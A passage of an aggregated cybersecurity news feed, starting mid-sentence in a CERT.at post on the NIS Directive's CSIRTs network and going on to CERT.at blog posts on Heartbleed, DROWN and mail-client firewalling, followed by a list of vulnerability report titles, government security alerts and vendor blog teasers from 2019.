pursuant to Article 9 of the NIS Directive.The CSIRTs NetworkThe NIS Directive also establishes a network of CSIRTs:Article 12:1.In order to contribute to the development of confidence and trust between the Member States and to promote swift and effective operational cooperation, a network of the national CSIRTs is hereby established. 2.The CSIRTs network shall be composed of representatives of the Member States' CSIRTs and CERT-EU. The Commission shall participate in the CSIRTs network as an observer. ENISA shall provide the secretariat and shall actively support the cooperation among the CSIRTs.If we take the definition "national CSIRTs" as "NIS CSIRTs in the Member States" then the two paragraphs fit together nicely: Each Member State creates or appoints one or more CSIRTs that cover the NIS constituency (OES + DSP) All of these CSIRTs are members of the CSIRTs Network If we take the "national CSIRTs" in 1. to mean the special role of the "National CERT", then paragraph 2. is inconsistent, as it talks about the Member States' CSIRTs, and not just the one special national CSIRT.SummaryThe language of the NIS Directive regarding "national CSIRTs" does not reflect the meaning of the term as it was used in the years prior to the NIS Directive and how it is still being used outside the NIS context.In the context of the NIS Directive, "national CSIRT" needs to read as shorthand for "CSIRT in a Member State that has been designated under the national transposition of the NIS-D's Article 9". This blog post is part of a series of blog posts related to our CEF-Telcom-2016-3 project, which also supports our participation in the CSIRTs Network. Author: Otmar Lendl

https://www.cert.at/en/blog/2018/8/blog-20180731155524-2252
Mac OS X tip: how to protect your mail client
2019-09-25T12:41:37Z | 1569415297

Based on some background knowledge that we received (update 2018/5/14 14:00 UTC+1: we now know it's the efail.de bug. The researchers went forward with the public release today), I am taking the liberty to document a setup which protects an Apple Mail installation that I have.The security measure is simple: disable remote content on Apple Mail. Go to Preferences -> General and uncheck the checkbox "Load Remote content in messages".However, there is an even stricter mechanism which does not rely on Apple Mail directly. Think of it as a second, very secure safety net. The idea: should any software component get hacked in my Apple Mail or should it leak information (such as encrypted Mail content), I want to make sure that my Apple Mail talks to one and only one single point of enforcement: the IMAP server it should talk to. And nothing else. Therefore, data exfiltration gets much harder.Luckily there is a good tool for this: Little Snitch (and as far as I know, this is the only tool of its kind on OS X). With Little Snitch, which acts as an outgoing firewall, I am able to protect and filter the communication flows.My Little Snitch setup only allows port 25 (SMTP) as well as IMAPs (port 993) connection for Apple Mail. HTTP(s) connects are definitely forbidden. That means that , yes, I won't see all images which reside on some web server. But in practice this does not matter. Either such a mail was spam / marketing in the first place or it was legit and is also visible via a browser if really needed (remember those "can't see this in your mail client? click here..." links in mails?).In other words: this is a super simple trick to get rid of a whole class of exfiltration attacks. I'd appreciate it if we had such a tool on Linux. Though... hang on... there is an initial attempt by @evilsocket: https://github.com/evilsocket/opensnitch. Haven't tested that yet. Eager to hear some feedback from you if it works on Linux.Anyway, thanks to Little Snitch (and maybe opensnitch), mail client hacking data exfiltration is not a threat anymore. Author: L. Aaron Kaplan

https://www.cert.at/en/blog/2018/5/blog-20180514112601-2208
Successful MISP workshop
2019-09-25T12:41:35Z | 1569415295

Last week, Alexandre and Andras from CIRCL.lu gave a MISP workshop to a packed crowed of ~ 60-70 people in Vienna.Infosharing FTW!MISP stands for "Malware Information Sharing Platform". See also misp-project.org. It allows us to synchronise IoCs with those who need the relevant information about attacks against their information systems. This blog post is part of a series of blog posts related to our CEF-Telcom-2016-3 project. Author: L. Aaron Kaplan

https://www.cert.at/en/blog/2018/2/blog-20180220133818-2135
Heartbleed: (Almost) three years later
2019-09-25T12:41:29Z | 1569415289

Shodan recently published a report on the state of Heartbleed which was picked up by lots of media outlets.I took this as an opportunity to have a look at our statistics. Shodan performs its scan based on IP-addresses and makes the results searchable. CERT.at also runs daily scans, but these are based on the list of domains under the Austrian ccTLD .at. We published a first report on these results in the summer of 2014. We're close to the three year mark now, which is a very long time the Internet. So how do our numbers look like in January 2017?We start by a list of domains under .at and look for web and mail servers as found by MX and A records. For web servers, we use either the domain itself, or www.$domain. This gives the following frame for the rest of the graphs: the roughly 1.5 million domains under .at are served by 200 thousand web servers and 100 thousand mail servers. Looking a the best TLS support these servers offer, we see that both for HTTPS (web) and SMTP (mail) about half of the servers support encrypted connections. As the larger mail-servers are much more likely to support TLS than smaller ones, the percentage of domains who can receive emails over TLS is actually about 90%.Testing all those servers for the Heartbleed vulnerability gives the following result:The vulnerable server barely show on the graph, for both protocols they are about 0.12% of all servers and about 0.22% of all servers offering TLS.Over time, the numbers have fallen in the usual long-tail drop-off curve. As the domain-list and domain to IP-address mappings are not refreshed daily, these refreshes show up as upward spikes in the graph. This implies that a part of the decline in vulnerable servers was caused by IP and domain churn.What does this mean for Domains?It's pointless to graph vulnerable vs. not-vulnerable domains, the bar for vulnerable servers is not visible. In numbers: 1557 domains (0.29% of all TLS-enabled ones) are still vulnerable on HTTPS, and 320 on SMTP (0.05%). Graphing the development yields:This graph is a rough approximation as the historical domain to IP mappings are not kept in the system. Anyway, something weird is going on. Lets have a closer look with regards to how important single servers are for the overall domain score. For that we'll use a combined graph showing the contributions of each server to the total number as well as the cumulative distribution function showing how many servers you need to fix to achieve x% of the vulnerable domains (Excel calls it the "Pareto Line").Let's start with the domains:The largest mailserver contributes about a third of the vulnerable domains, take the first three and they cover half of the heartbleed-affected Domains. Those are run by a small ISP, a PR/web agency and a private person, respectively.The same graph for HTTPS looks like this:This is far more concentrated: The first server hosts 809 domains (about half of the total), the second one 480 and third one 11. About 100 server comprise the long tail of vulnerable servers hosting just one .at domain. Checking some of the domains on these servers shows that the first one is run by a local ISP/registrar and is used for domains that are not in use. The second one only serves "this domain is for sale". Summary: While Shodan still found a good number of vulnerable servers on the Austrian Internet, these are mostly not the servers that host relevant content.Author: Otmar Lendl

https://www.cert.at/en/blog/2017/1/blog-20170127160051-1894
DROWN update
2019-09-25T12:41:24Z | 1569415284

As I wrote in our initial DROWN blogpost, we're scanning .at for mail- and web-servers which are still supporting SSLv2. We're notifying our constituency and we see a steady drop in the number of servers (as measured by IP-Addresses) that are vulnerable: So it is slowly getting better.Looking at the feedback we receive there is one point though that needs extra attention: Disabling all SSLv2 ciphers might not be enough. You need to disable the SSLv2 protocol.See this FAQ from the DROWN website: DROWN is made worse by two additional OpenSSL implementation vulnerabilities. CVE-2015-3197, which affected OpenSSL versions prior to 1.0.2f and 1.0.1r, allows a DROWN attacker to connect to the server with disabled SSLv2 ciphersuites, provided that support for SSLv2 itself is enabled. CVE-2016-0703, which affected OpenSSL versions prior to 1.0.2a, 1.0.1m, 1.0.0r, and 0.9.8zf, greatly reduces the time and cost of carrying out the DROWN attack. We will thus continue to send warnings as long as SSLv2 is not completely disabled. For the typical Linux setup, this openssl.org post contains suitable configuration advise.Author: Otmar Lendl

https://www.cert.at/en/blog/2016/4/blog-20160411112546-1720
One quick note on DNSSEC Validation failures
2019-09-25T12:41:15Z | 1569415275

I wrote back in 2010 that ISPs should prepare for the inevitable backlash if their DNSSEC-aware resolvers black out an important domain.We now had just such a case: the protagonists make it even juicier than I imagined: Comcast customers could not access the new HBO website where they could get the HBO programming without paying for a full cable TV package.Accusation were flying, emergency debugging and cache clearing ensued and we're now in the "What went wrong?" and "./ style discussions" stage. It looks like Comcast weathered that storm pretty well. This may be a result of good social media work, a quick fix from HBO, and the fact that Google's 8.8.8.8 nameserver also does DNSSEC validation. Author: Otmar Lendl

https://www.cert.at/en/blog/2015/3/blog-20150311140232-1459
Lesestoff: Ron Deibert
2019-09-25T12:41:12Z | 1569415272

Wir leben nicht nur in einer technisch interessanten Zeit, sondern auch die gesellschaftliche Diskussion rund um Geheimdienste, Privatsphäre, Verschlüsselung, 0-Days bis hin zu "Cyberwar" ist für die Zukunft des Internets sehr relevant.Dazu wird viel geschrieben und publiziert, ich will hier auf einen aktuellen Artikel von Ron Deibert hinweisen, weil er auch die Rolle der CERTs in diesem Kontext anspricht: There are international implications of the cyber security syndrome. Top-down, secretive approaches breed vicious cycles of mutual suspicion and hostility that stifle numerous forms of lower level cooperation. Consider the deleterious impact on the information sharing practices of national-level computer emergency response teams (CERTs). In an ideal world, CERTS are entirely apolitical and operate as early-warning systems that share network threat information with each other seamlessly. But as Asia Pacific CERT coordinator Yuri Ito explained at the 2013 Bali IGF, the growing influences of national security agencies and the rivalries and suspicion they engender have eaten into the system of international trust and cooperation. If CERTs are seen as "instruments of state competition," says Ito, "it can become very hard to share information." Jeopardizing the integrity of CERTs in this way -- the frontline sensors for computer security threats worldwide -- is a clear indication that we are down the wrong path. Ich kann nur empfehlen, den ganzen Text zu lesen.Author: Otmar Lendl

https://www.cert.at/en/blog/2014/11/blog-20141126103149-1319
High Threat Security Alert (A19-09-05): Multiple Vulnerabilities in Microsoft Internet Explorer and Defender
2019-09-24T04:00:00Z | 1569297600

Microsoft has released out-of-band security updates addressing the vulnerabilities found in the Internet Explorer and Microsoft Defender. Reports indicate that active exploitation against the vulnerability in Microsoft Internet Explorer for remote code execution has been observed.

https://www.govcert.gov.hk/en/alerts_detail.php
E2fsprogs quotaio_tree.c report_tree() code execution vulnerability
2019-09-24T00:00:00Z | 1569283200

https://talosintelligence.com/vulnerability_reports/TALOS-2019-0887
QueryCon 2019: A Turning Point for osquery
2019-09-20T11:00:58Z | 1568977258

Has it really been 3 months since Trail of Bits hosted QueryCon? We’ve had such a busy and productive summer that we nearly forgot to go back and reflect on the success of this event! On June 20-21, Trail of Bits partnered with Kolide and Carbon Back to host the 2nd annual QueryCon, at the […]

https://blog.trailofbits.com/2019/09/20/querycon-2019-a-turning-point-for-osquery/
Statement regarding Huawei’s suspension from the Forum of Incident Response and Security Teams (FIRST)
2019-09-18T20:00:00Z | 1568836800

September 18th, 2019 – At FIRST we strongly believe that in order to build a global cybersecurity incident response community, from which every company or user participating in the Internet can benefit, we should all work to limit the impact of sanctions or export regulations on incident responders. This includes being a forum where technology corporations such as Huawei, have the ability to participate the same as others.

https://www.first.org/newsroom/releases/20190918
The Massive Propagation Of The Smominru Botnet
2019-09-18T13:00:00Z | 1568811600

In this post, Guardicore Labs provides an in-depth analysis of the attack campaign, focusing on victim analysis and attack infrastructure.

https://www.akamai.com/blog/security/the-massive-propagation-of-the-smominru-botnet
Cloud-based SD-WAN: The optimal approach to WAN latency
2019-09-18T08:50:16Z | 1568796616

A recent Tech Research Asia study found that on average, “network problems” lead to 71 hours of productivity loss. This stat struck a chord with me as it helps to quantify a common problem the Cato team works with customers to solve: reducing WAN latency. With the growing popularity of cloud services like Unified Communications-as-a-Service... The post Cloud-based SD-WAN: The optimal approach to WAN latency appeared first on Cato Networks.

https://www.catonetworks.com/blog/cloud-based-sd-wan-the-optimal-approach-to-wan-latency/
New DDoS Vector Observed in the Wild: WSD Attacks Hitting 35/Gbps
2019-09-18T04:00:00Z | 1568779200

Additional research and support provided by Chad Seaman. Introduction Members of Akamai's Security Intelligence Response Team have been investigating a new DDoS vector that leverages a UDP Amplification technique known as WS-Discovery (WSD). The situation surrounding WSD was recently made...

https://www.akamai.com/blog/security/new-ddos-vector-observed-in-the-wild-wsd-attacks-hitting-35gbps
Aspose.PDF for C++ LZWDecode filter predictor remote code execution vulnerability
2019-09-17T00:00:00Z | 1568678400

https://talosintelligence.com/vulnerability_reports/TALOS-2019-0855
Aspose.PDF for C++ parent generation remote code execution vulnerability
2019-09-17T00:00:00Z | 1568678400

https://talosintelligence.com/vulnerability_reports/TALOS-2019-0856
Aspose.PDF for C++ Remote Code Execution Vulnerability
2019-09-17T00:00:00Z | 1568678400

https://talosintelligence.com/vulnerability_reports/TALOS-2019-0809
Atlassian Jira WikiRenderer parser XSS vulnerability
2019-09-16T00:00:00Z | 1568592000

https://talosintelligence.com/vulnerability_reports/TALOS-2019-0833
Atlassian Jira Worklog Information Disclosure Vulnerability
2019-09-16T00:00:00Z | 1568592000

https://talosintelligence.com/vulnerability_reports/TALOS-2019-0840
AMD ATI Radeon ATIDXX64.DLL shader functionality remote code execution vulnerability
2019-09-16T00:00:00Z | 1568592000

https://talosintelligence.com/vulnerability_reports/TALOS-2019-0818
Atlassian Jira CSRF Login Vulnerability
2019-09-16T00:00:00Z | 1568592000

https://talosintelligence.com/vulnerability_reports/TALOS-2019-0834
Atlassian Jira Issue Key Information Disclosure Vulnerability
2019-09-16T00:00:00Z | 1568592000

https://talosintelligence.com/vulnerability_reports/TALOS-2019-0836
Atlassian Jira CSRF Protections Bypass Vulnerability
2019-09-16T00:00:00Z | 1568592000

https://talosintelligence.com/vulnerability_reports/TALOS-2019-0835
Atlassian Jira issueTable username information disclosure vulnerability
2019-09-16T00:00:00Z | 1568592000

https://talosintelligence.com/vulnerability_reports/TALOS-2019-0839
Atlassian Jira issue attachment name information disclosure vulnerability
2019-09-16T00:00:00Z | 1568592000

https://talosintelligence.com/vulnerability_reports/TALOS-2019-0837
Atlassian Jira Tempo plugin issue summary information disclosure vulnerability
2019-09-16T00:00:00Z | 1568592000

https://talosintelligence.com/vulnerability_reports/TALOS-2019-0838
RIA võtab riiklikes teenuses kasutusele Smart-ID
2019-09-13T06:55:18Z | 1568357718

Selle nädala alguses sõlmisid Riigi Infosüsteemi Amet (RIA) ja Smart-ID lahenduse pakkuja SK ID Solutions (SK) lepingu, mis võimaldab riiklikes e-teenustes kasutada autentimisvahendina ka Smart-ID-d.

https://ria.ee/uudised/ria-votab-riiklikes-teenuses-kasutusele-smart-id
The Way Forward: How SD-WAN Benefits the Modern Enterprise
2019-09-12T11:13:30Z | 1568286810

In 2019, it has become clear that SD-WAN has secured its position as the way forward for enterprise WAN connectivity. Market adoption is growing rapidly, and industry experts have declared a winner in the SD-WAN vs MPLS debate. For example, Network World called 2018 the year of SD-WAN, and before the end of Q3 2018... The post The Way Forward: How SD-WAN Benefits the Modern Enterprise appeared first on Cato Networks.

https://www.catonetworks.com/blog/the-way-forward-how-sd-wan-benefits-the-modern-enterprise/
Crypto 2019 Takeaways
2019-09-11T10:50:16Z | 1568199016

This year’s IACR Crypto conference was an excellent blend of far-out theory and down-to-earth pragmatism. A major theme throughout the conference was the huge importance of getting basic cryptographic primitives right. Systems ranging from TLS servers and bitcoin wallets to state-of-the-art secure multiparty computation protocols were broken when one small sub-component was either chosen poorly […]

https://blog.trailofbits.com/2019/09/11/crypto-2019-takeaways/
High Threat Security Alert (A19-09-03): Multiple Vulnerabilities in Microsoft Products (September 2019)
2019-09-11T04:00:00Z | 1568174400

Microsoft has released security updates addressing multiple vulnerabilities and which affect several Microsoft products or components.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A19-09-04): Multiple Vulnerabilities in Adobe Flash Player
2019-09-11T04:00:00Z | 1568174400

Security updates are released for Adobe Flash Player to address the vulnerabilities.

https://www.govcert.gov.hk/en/alerts_detail.php
Will cloud-based networking be your next WAN?
2019-09-09T12:50:56Z | 1568033456

It’s no secret the public cloud is growing. According to Gartner, the global public cloud market is expected to grow 17.3 % this year. And it’s also no secret that as more applications move to the cloud, significant changes are hosted onto the WAN. With the cloud, most traffic is bound for the Internet, making... The post Will cloud-based networking be your next WAN? appeared first on Cato Networks.

https://www.catonetworks.com/blog/will-cloud-based-networking-be-your-next-wan/
NETGEAR N300 WNR2000v5 unauthenticated HTTP denial-of-service vulnerability
2019-09-09T00:00:00Z | 1567987200

https://talosintelligence.com/vulnerability_reports/TALOS-2019-0831
NETGEAR N300 WNR2000v5 unauthenticated host access point daemon denial-of-service vulnerability
2019-09-09T00:00:00Z | 1567987200

https://talosintelligence.com/vulnerability_reports/TALOS-2019-0832
Security Alert (A19-09-02): Multiple Vulnerabilities in PHP
2019-09-06T04:00:00Z | 1567742400

Multiple vulnerabilities have been found in PHP.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A19-09-01): Multiple Vulnerabilities in Firefox
2019-09-04T04:00:00Z | 1567569600

Mozilla has published three security advisories (MFSA 2019-25, MFSA 2019-26 and MFSA 2019-27) to address multiple browser vulnerabilities.

https://www.govcert.gov.hk/en/alerts_detail.php
Blynk inc. Blynk-Library BlynkProtocol::processInput() information disclosure vulnerability
2019-09-04T00:00:00Z | 1567555200

https://talosintelligence.com/vulnerability_reports/TALOS-2019-0854
DeepState Now Supports Ensemble Fuzzing
2019-09-03T10:50:44Z | 1567507844

We are proud to announce the integration of ensemble fuzzing into DeepState, our unit-testing framework powered by fuzzing and symbolic execution. Ensemble fuzzing allows testers to execute multiple fuzzers with varying heuristics in a single campaign, while maintaining an architecture for synchronizing generated input seeds across […]

https://blog.trailofbits.com/2019/09/03/deepstate-now-supports-ensemble-fuzzing/
Epignosis eFront LMS unauthenticated SQL injection vulnerability
2019-09-03T00:00:00Z | 1567468800

https://talosintelligence.com/vulnerability_reports/TALOS-2019-0859
Epignosis eFront LMS PHP deserialization code execution vulnerability
2019-09-03T00:00:00Z | 1567468800

https://talosintelligence.com/vulnerability_reports/TALOS-2019-0858
Uku Särekanno asub tööle Euroopa Liidu IT-agentuuri eu-LISA
2019-09-02T11:09:01Z | 1567422541

RIA küberturvalisuse teenistuse juht Uku Särekanno asub 1. oktoobrist tööle ELi IT-agentuuri eu-LISA, kus ta hakkab koordineerima uute suuremahuliste andmebaaside kasutusele võtmist Schengeni alas. Peadirektori asetäitja ametikoha täitmiseks kuulutatakse lähiajal välja avalik konkurss.

https://ria.ee/uudised/uku-sarekanno-asub-toole-euroopa-liidu-it-agentuuri-eu-lisa
Rewriting Functions in Compiled Binaries
2019-09-02T10:50:31Z | 1567421431

As a summer intern at Trail of Bits, I’ve been working on building Fennec, a tool to automatically replace function calls in compiled binaries that’s built on top of McSema, a binary lifter developed by Trail of Bits. The Problem Let’s say you have a compiled binary, but you […]

https://blog.trailofbits.com/2019/09/02/rewriting-functions-in-compiled-binaries/
CERT-EE hoiatab petuarvete ja -skeemi eest
2019-08-30T12:44:28Z | 1567169068

Täna saadeti rahapetmiseks mitmete Eesti asutuste ja ettevõtete juhtide nimelt petukirju. Libaarvetega varustatud kirju saadeti nii eraettevõttetele kui ka riigiasutustele.

https://ria.ee/uudised/cert-ee-hoiatab-petuarvete-ja-skeemi-eest
Binary symbolic execution with KLEE-Native
2019-08-30T10:50:08Z | 1567162208

KLEE-Native, a fork of KLEE that operates on binary program snapshots by lifting machine code to LLVM bitcode.

https://blog.trailofbits.com/2019/08/30/binary-symbolic-execution-with-klee-native/
Security Alert (A19-08-07): Multiple Vulnerabilities in Cisco Products
2019-08-30T04:00:00Z | 1567137600

Cisco released security advisories to address the vulnerabilities in Cisco IOS XE, NX-OS and FXOS software.

https://www.govcert.gov.hk/en/alerts_detail.php
XMR Cryptomining Targeting x86/i686 Systems
2019-08-30T04:00:00Z | 1567137600

I have been playing close attention to Internet of Things (IoT) malware targeting systems with Telnet enabled, while also collecting samples targeting systems with SSH enabled on port 22. I've collected over 650 samples landing in my honeypot within the...

https://www.akamai.com/blog/security/xmr-cryptomining-targeting-x86i686-systems
Reverse Taint Analysis Using Binary Ninja
2019-08-29T10:50:20Z | 1567075820

We open-sourced a set of static analysis tools, KRFAnalysis, that analyze and triage output from our system call (syscall) fault injection tool KRF. Now you can easily figure out where and why, KRF crashes your programs. During my summer internship at Trail of Bits, I worked on KRF, […]

https://blog.trailofbits.com/2019/08/29/reverse-taint-analysis-using-binary-ninja/
Security Alert (A19-08-04): Vulnerability in Squid
2019-08-27T04:00:00Z | 1566878400

Squid has published a security advisory (SQUID-2019:5) to address a buffer overflow vulnerability.

https://www.govcert.gov.hk/en/alerts_detail.php
High Threat Security Alert (A19-08-05): Multiple Vulnerabilities in Fortinet and Pulse Secure Products
2019-08-27T04:00:00Z | 1566878400

Fortinet and Pulse Secure released security advisories to address the vulnerabilities in their SSL VPN services.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A19-08-06): Vulnerability in Apple iOS
2019-08-27T04:00:00Z | 1566878400

Apple has released a security update in its latest iOS version 12.4.1 to fix a vulnerability identified in various iOS devices.

https://www.govcert.gov.hk/en/alerts_detail.php
Wrapper’s Delight
2019-08-26T10:50:40Z | 1566816640

During my summer at Trail of Bits, I took full advantage of the latest C++ language features to build a new SQLite wrapper from scratch that is easy to use, lightweight, high performant, and concurrency friendly—all in under 750 lines of code.

https://blog.trailofbits.com/2019/08/26/wrappers-delight/
SD WAN redundancy vs. MPLS redundancy
2019-08-26T07:02:56Z | 1566802976

According to a recent Uptime Institute report, network failures trail only power outages as a cause of downtime. The data also suggests that full “2N” redundancy is also an excellent way to mitigate the risk of downtime. This got me thinking about a reoccurring conversation about SDWAN redundancy I have with IT managers. In one... The post SD WAN redundancy vs. MPLS redundancy appeared first on Cato Networks.

https://www.catonetworks.com/blog/sd-wan-redundancy-vs-mpls-redundancy/
Valmisid DigiDoc4 praktilised õppevideod
2019-08-22T07:14:43Z | 1566458083

Valminud on DigiDoc4 praktilised õppevideod, mis annavad ülevaate ID-kaardiga tehtavatest toimingutest. Videod on eesti, vene ja inglise keeles.

https://ria.ee/uudised/valmisid-digidoc4-praktilised-oppevideod
In Conversation: The Women in Network Security
2019-08-22T04:00:00Z | 1566446400

Why does network security matter? On average, there is a hacker attack every 39 seconds. If any of these attacks result in a data breach, they could cost over $150 million, with research suggesting that cyber-attacks could cost businesses over...

https://www.akamai.com/blog/culture/in-conversation-the-women-in-network-security
RIA sõlmis Indiaga koostöölepingu küberturvalisuse kaitseks
2019-08-21T15:44:12Z | 1566402252

Täna, 21. augustil sõlmis Riigi Infosüsteemi Amet (RIA) koostöölepingu Indiaga, mille järgi hakkavad kaks riiki efektiivsemalt küberturvalisust kaitsma.

https://ria.ee/uudised/ria-solmis-indiaga-koostoolepingu-kuberturvalisuse-kaitseks
NaaS Meets SD-WAN: What is NaaS anyway and How Will It Impact Your SaaS, PaaS, and Cloud Strategy?
2019-08-21T06:20:53Z | 1566368453

According to a recent forecast, the global NaaS (Network as a Service) market is expected to grow at a CAGR of 38.3% from 2018 to 2023. The forecast cites reduced costs, increased security, and enhanced agility as growth drivers for the NaaS market. With such bullish projections and potential for business impact, It’s no wonder... The post NaaS Meets SD-WAN: What is NaaS anyway and How Will It Impact Your SaaS, PaaS, and Cloud Strategy? appeared first on Cato Networks.

https://www.catonetworks.com/blog/taking-network-as-a-service-naas-to-the-next-level/
Aspose Aspose.Cells for C++ LabelSst Code Execution Vulnerability
2019-08-20T00:00:00Z | 1566259200

https://talosintelligence.com/vulnerability_reports/TALOS-2019-0794
Aspose Aspose.Words for C++ EnumMetaInfo Code Execution Vulnerability
2019-08-20T00:00:00Z | 1566259200

https://talosintelligence.com/vulnerability_reports/TALOS-2019-0805
Aspose Aspose.Cells for C++ Number Code Execution Vulnerability
2019-08-20T00:00:00Z | 1566259200

https://talosintelligence.com/vulnerability_reports/TALOS-2019-0795
Vulnerabilities in Microsoft Remote Desktop app exploited in data breaches
2019-08-19T07:35:27Z | 1566200127

Several critical vulnerabilities have been discovered in Remote Desktop Services (RDS, Remote Desktop app) in the Microsoft Windows operating system. These 'wormable' vulnerabilities can be exploited by malware to propagate itself from one vulnerable computer to another automatically. The NCSC-FI has received reports about these vulnerabilities being exploited both in Finland and abroad. There are software updates addressing the vulnerabilities and it is critical to install these updates immediately.

https://www.kyberturvallisuuskeskus.fi/en/vulnerabilities-microsoft-remote-desktop-app-exploited-data-breaches
Edge DNS: Zone Apex Mapping & DNSSEC
2019-08-19T07:00:00Z | 1566198000

Along with its DDoS resilience and impressive global footprint, Akamai Edge DNS offers zone administrators additional technical flexibility and implementation options to improve performance and simplify DNS operations. One example is zone apex mapping (ZAM), a feature that enables top level hostnames (e.g., akamai.com) to resolve directly to an Akamai edge IP. The popularity and appeal of ZAM do, however, prompt a number of questions about the technical specifics, such as: Is ZAM interoperable with DNSSEC?

https://www.akamai.com/blog/security/edge-dns--zone-apex-mapping---dnssec
Nest Labs Nest Cam IQ Indoor Weave Legacy Pairing Information Disclosure Vulnerability
2019-08-19T00:00:00Z | 1566172800

https://talosintelligence.com/vulnerability_reports/TALOS-2019-0797
Nest Labs Nest Cam IQ Indoor Weave TCP connection denial-of-service vulnerability
2019-08-19T00:00:00Z | 1566172800

https://talosintelligence.com/vulnerability_reports/TALOS-2019-0810
Nest Labs Openweave Weave tool Print-TLV code execution vulnerability
2019-08-19T00:00:00Z | 1566172800

https://talosintelligence.com/vulnerability_reports/TALOS-2019-0801
Nest Labs Openweave Weave DecodeMessageWithLength Information Disclosure Vulnerability
2019-08-19T00:00:00Z | 1566172800

https://talosintelligence.com/vulnerability_reports/TALOS-2019-0803
Nest Labs Openweave Weave ASN1Writer PutValue Code Execution Vulnerability
2019-08-19T00:00:00Z | 1566172800

https://talosintelligence.com/vulnerability_reports/TALOS-2019-0802
Nest Labs Nest Cam IQ Indoor WeaveCASEEngine::DecodeCertificateInfo denial-of-service vulnerability
2019-08-19T00:00:00Z | 1566172800

https://talosintelligence.com/vulnerability_reports/TALOS-2019-0800
Nest Labs Nest Cam IQ Indoor Weave PASE pairing brute force vulnerability
2019-08-19T00:00:00Z | 1566172800

https://talosintelligence.com/vulnerability_reports/TALOS-2019-0798
Nest Labs Nest Cam IQ Indoor Weave KeyError denial-of-service vulnerability
2019-08-19T00:00:00Z | 1566172800

https://talosintelligence.com/vulnerability_reports/TALOS-2019-0799
CVE-2019-13921
2019-08-19T00:00:00Z | 1566172800

INSUFFICIENT RESOURCE POOL CWE-410 An unauthenticated attacker sending a large HTTP request to the host where WinAC RTX is running may trigger a denial-of-service condition.

https://claroty.com/team82/disclosure-dashboard/cve-2019-13921
Security Alert (A19-08-03): Vulnerability in Firefox
2019-08-15T04:00:00Z | 1565841600

Mozilla has published a security advisory (MFSA 2019-24) to address a browser vulnerability.

https://www.govcert.gov.hk/en/alerts_detail.php
Levivad uut tüüpi petukirjad
2019-08-14T12:40:14Z | 1565786414

Viimastel päevadel on levinud uut tüüpi petukirjad, mille abil üritavad kurjategijad ettevõtetelt raha välja meelitada.

https://ria.ee/uudised/levivad-uut-tuupi-petukirjad
How to connect multiple offices quickly and affordably with Cato Cloud
2019-08-14T12:28:04Z | 1565785684

One complaint I often hear is how the WAN can be a bottleneck to productivity. MPLS circuits can take weeks even months to provision depending on location. All too often, IT directors have told me they need to explain why MPLS circuit delivery is a holdup for branch office going live. At a time where... The post How to connect multiple offices quickly and affordably with Cato Cloud appeared first on Cato Networks.

https://www.catonetworks.com/blog/how-to-connect-multiple-offices-quickly-and-affordably-with-cato-cloud/
High Threat Security Alert (A19-08-01): Multiple Vulnerabilities in Microsoft Products (August 2019)
2019-08-14T04:00:00Z | 1565755200

Microsoft has released security updates addressing multiple vulnerabilities which affect several Microsoft products or components.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A19-08-02): Multiple Vulnerabilities in Adobe Reader/Acrobat
2019-08-14T04:00:00Z | 1565755200

Security updates are released for Adobe Reader/Acrobat to address multiple vulnerabilities.

https://www.govcert.gov.hk/en/alerts_detail.php
HTTP2 Vulnerabilities
2019-08-13T04:00:00Z | 1565668800

On Tuesday, August 13th at 10 AM Pacific Time (1700UTC), Netflix publicly disclosed a series of vulnerabilities found by Jonathan Looney that impact many implementations of the HTTP2 protocol. A vulnerability found by Piotr Sikora of Google was also released...

https://www.akamai.com/blog/security/http2-vulnerabilities
Schneider Electric Modicon M580 UMAS Function Code 0x29 Denial of Service Vulnerability
2019-08-13T00:00:00Z | 1565654400

https://talosintelligence.com/vulnerability_reports/TALOS-2019-0807
Schneider Electric Modicon M580 UMAS read strategy denial-of-service vulnerability
2019-08-13T00:00:00Z | 1565654400

https://talosintelligence.com/vulnerability_reports/TALOS-2018-0736
Schneider Electric Modicon M580 HTTP Request Denial of Service Vulnerability
2019-08-13T00:00:00Z | 1565654400

https://talosintelligence.com/vulnerability_reports/TALOS-2019-0808
Schneider Electric Modicon M580 UMAS Read System Coils and Registers Denial of Service Vulnerability
2019-08-13T00:00:00Z | 1565654400

https://talosintelligence.com/vulnerability_reports/TALOS-2019-0806
CVE-2019-6834
2019-08-13T00:00:00Z | 1565654400

DESERIALIZATION OF UNTRUSTED DATA CWE-502A vulnerability exists which could allow an attacker to execute arbitrary code on the targeted system with SYSTEM privileges when placing a malicious file at a certain location on the filesystem. By default, this folder location requires the malicious user to be authenticated for this vulnerability to be successfully exploited.

https://claroty.com/team82/disclosure-dashboard/cve-2019-6834
Several pre-auth vulnerability in enterprise SSL VPN
2019-08-09T20:00:00Z | 1565380800

Critical vulnerabilities in enterprise virtual private network (VPN) solutions from Palo Alto Networks, Fortinet and Pulse Secure allow attackers to infiltrate corporate networks, obtain sensitive information, and eavesdrop on communications, researchers warn (SonicWall products are not vulnerable to this vulnerability). CVE: CVE-2019-1579,CVE-2019-11510,CVE-2019-11542,CVE-2019-11539,CVE-2019-11538,CVE-2019-11508,CVE-2019-11540,CVE-2019-13379,CVE-2019-13380,CVE-2019-13381,CVE-2019-13382,CVE-2019-13383 Last updated: Aug. 9, 2019, 8 p.m.

https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2019-0010
A Day in the Life of Alessandro Gario, Senior Security Engineer
2019-08-09T12:00:18Z | 1565352018

People interested in joining Trail of Bits often ask us what it’s like to work on the Engineering Services team. We felt that the best answer would be a profile of some of the talented individuals on our team, and let them describe their experiences at Trail of Bits in their own words. Today, we’re […]

https://blog.trailofbits.com/2019/08/09/a-day-in-the-life-of-alessandro-gario-senior-security-engineer/
From On-Prem to Cloud: The Complete AWS Security Checklist
2019-08-08T18:27:00Z | 1565288820

This complete AWS cloud auditing security checklist outlines what it takes to protect sensitive data center security & intellectual property when securing an organization?s cloud deployment.

https://www.akamai.com/blog/security/complete-cloud-migration-aws-security-checklist
246 Findings From our Smart Contract Audits: An Executive Summary
2019-08-08T10:50:40Z | 1565261440

Until now, smart contract security researchers (and developers) have been frustrated by limited information about the actual flaws that survive serious development efforts. That limitation increases the risk of making critical smart contracts vulnerable, misallocating resources for risk reduction, and missing opportunities to employ automated analysis tools. We’re changing that. Today, Trail of Bits is […]

https://blog.trailofbits.com/2019/08/08/246-findings-from-our-smart-contract-audits-an-executive-summary/
